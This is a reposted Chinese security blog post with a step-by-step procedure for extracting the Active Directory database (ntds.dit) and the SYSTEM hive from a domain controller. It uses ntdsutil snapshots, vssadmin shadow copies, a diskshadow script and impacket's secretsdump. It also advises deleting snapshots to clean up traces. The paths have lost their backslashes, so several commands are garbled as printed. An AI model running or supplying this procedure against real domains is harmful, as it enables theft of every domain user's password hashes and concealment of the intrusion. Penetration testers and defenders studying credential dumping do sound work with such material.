NTDS描述:
NTDS.DIT是主要的AD数据库,存放在C:windowsNTDSNTDS.dit,包括有关域用户,组和成员身份的信息,它还包括域中所有用户的密码哈希值。为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。
Ntdsutil
Ntdsutil 域控制器默认安装,使管理员能访问和管理 Windows Active Directory 数据库。
Path:C:WindowsSystem32ntdsutil.exe
需要权限:域管权限
1、创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
2、挂载快照
ntdsutil snapshot "mount {0aedf547-xxxxxxx}" quit quit
3、复制 ntds.dit
copy C:$SNAP_xxxxxx$windowsNTDSntds.dit c:ntds.dit
4、导出SYSTEM文件
copy C:$SNAP_xxxxxxx$WindowsSystem32configSYSTEM c:Userssys.hiv
5、卸载快照
ntdsutil snapshot "unmount {0aedf547-xxxxxx}" quit quit
6、删除快照
ntdsutil snapshot "delete {0aedf547-xxxxxxx}" quit quit
7、快照查询
查询所有快照:ntdsutil snapshot "List All" quit quit
查询已挂载的快照:ntdsutil snapshot "List Mounted" quit quit
Vssadmin
域控制器默认安装。磁碟区阴影复制服务(英语:Volume Shadow Copy Service)是微软Windows的一项元件服务。
磁碟区阴影复制服务是一项定时为磁碟区作复制的服务。服务会在磁碟区新增一个名为“阴影复制”(Shadow Copy)的选项。这服务可为离线用户提供离线档案服务。
需要权限:域管权限
1、查询当前系统的快照
vssadmin list shadows
2、创建快照
vssadmin create shadow /for=c: /autoretry=10 
3、复制 ntds.dit
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3windowsNTDSntds.dit c:ntds.dit
4、删除快照
vssadmin delete shadows /for=c: /quiet
TIPS:没有删除快照,查询就是这样的。注意清理痕迹。
Diskshadow
DiskShadow 是由微软官方签名的,是公开卷影复制服务 (VSS) 提供的功能的工具。默认情况下,Diskshadow 使用类似于 Diskraid 或 Diskpart 的交互式命令解释程序。Diskshadow 还包括可编写脚本的模式。
适用范围:Windows Server 2022、2019、2016、2012
Path:
C:windowssystem32diskshadow.exe
C:WindowsSysWOW64diskshadow.exe
下面利用脚本模式提取AD数据库
1、查看没有使用的盘符
wmic logicaldisk
2、调用脚本
diskshadow.exe /s C:shadow.txtshadow.txt 代码,注意导出路径。
set context persistent nowritersadd volume c: alias someAliascreateexpose %someAlias% s:exec "C:windowssystem32cmd.exe" /c copy s:windowsntdsntds.dit z:ntds.ditdelete shadows volume %someAlias%reset
Impacket
secretsdump.py 域名/user:pass@域控IP -dc-ip 域控IP
原文始发于微信公众号(YongYe 安全实验室):NTDS手工导出方法
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论